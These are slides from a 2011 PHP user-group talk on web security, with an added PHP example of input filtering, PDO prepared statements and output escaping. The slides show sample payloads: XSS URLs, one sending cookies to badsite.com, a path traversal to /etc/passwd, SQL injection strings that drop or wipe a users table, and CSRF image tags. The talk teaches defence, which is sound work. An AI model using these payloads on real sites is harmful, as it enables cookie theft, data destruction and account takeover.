SydPHP Security in PHP

Security in PHP talk for SydPHP, Thursday 24th February, 2011

Security and PHP

February 2011

Allan Shone

Technical Yahoo!, Local Paranoid @Yahoo!7

Been at Yahoo!7 just under 3 years

allan.shone@yahoo.com

Website Security

What is Security?

Why is Security important?

What can you do about it?

Types of issues

XSS

SQL Injection

Session Hijacking

CSRF

Phishing

Why XSS?

Lead to larger problems

Used to inject code into your site

Bad people ™ can steal user information

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E

http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E

http://sydphp.leetbix.com/template.php?load=/etc/passwd%00

http://sydphp.leetbix.com/template.php?load=../some-config.conf%00

POST too

What do I do?!

Filter

Simplest solution: htmlentities()

SQL what?

Arbitrary SQL code being executed

Bypass login, edit database content

Find passwords, hidden information

http://sydphp.leetbix.com/login.php

Password: ' OR 1=1 -- '

' OR 1=1; DROP TABLE users; -- '

' OR 1=1; UPDATE TABLE users SET password='' WHERE 1=1; -- '

Oh no!

http://xkcd.com/327/

escape

mysql_real_escape_string()

addslashes()

PDO

PDO::quote()

Session hijacking

Bad for users

Bad for data integrity

Easy to prevent

Not stand-alone

Cookies

Integrity checking

CSRF? Sugar?

Cross-site request forgery

Simple, but uncommon

<img src="http://othersite.com/changepasswd?new=onlyIKnow" />

<script>a=document.createElement('img');a.src='http://badsite../';document.firstChild.appendChild(a);a.src='http://badsite.com/otherpage';</script>

Integrity, integrity

Phishing!

Same, but different?

But what can you do

PHP’s filter functions

filter_has_var

filter_id

filter_input_array

filter_input

filter_list

filter_var_array

filter_var

No more SuperGlobals

$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);

echo "<h3>No results found for '{$search}'.</h3>";

echo "<a href='?search=$search&page=2'>Next page</a>";
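The three steps the slides name (filter the input, keep SQL and data apart with PDO, escape on output) put together for the login form from the SQL injection slides. This is an added example, not code from the talk; the `$pdo` connection details, the `users` table with a `password_hash` column, and the use of `password_verify()` instead of a plaintext password column are assumptions that are not on the slides.

```php
<?php
declare(strict_types=1);

// Added example, not from the talk. The PDO DSN/credentials, the
// `users` table layout and the hashed-password column are hypothetical.

// 1. Read input through filter_input() instead of touching $_POST.
//    FILTER_UNSAFE_RAW leaves the value intact: the password has to reach
//    password_verify() unchanged, and escaping belongs at the point of
//    use (the query, the HTML), not on the way in.
$username = filter_input(INPUT_POST, 'username', FILTER_UNSAFE_RAW);
$password = filter_input(INPUT_POST, 'password', FILTER_UNSAFE_RAW);

// filter_input() returns null when the field is absent, false on failure.
if (!is_string($username) || !is_string($password)) {
    http_response_code(400);
    exit('Missing credentials');
}

// Vulnerable form, for contrast only: concatenating the values lets the
// "' OR 1=1 -- " payload from the slides change what the query means.
//   $sql = "SELECT * FROM users WHERE username='$username' AND password='$password'";

// 2. Hardened form: the SQL text is fixed and the user data is bound as a
//    parameter, so the database never parses it as part of the statement.
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app', 'secret', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
]);

$stmt = $pdo->prepare('SELECT id, password_hash FROM users WHERE username = :username');
$stmt->execute([':username' => $username]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);

// Check against a stored password_hash() value rather than a plaintext
// column, so "Find passwords" from the slides has nothing to find.
$ok = $user !== false && password_verify($password, $user['password_hash']);

// 3. Escape on output: htmlentities() turns a <script> tag in the username
//    into literal text, so reflecting it back cannot become XSS.
$safeName = htmlentities($username, ENT_QUOTES | ENT_HTML5, 'UTF-8');
echo $ok
    ? "<p>Welcome back, {$safeName}.</p>"
    : "<p>Login failed for '{$safeName}'.</p>";
```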

INPUT_GET

INPUT_POST

INPUT_COOKIE

INPUT_SERVER

INPUT_ENV

Twitter

Allan Shone - @cerealboy

Jared Mooring - @jadzor

Filter function filters: http://au2.php.net/manual/en/filter.filters.php
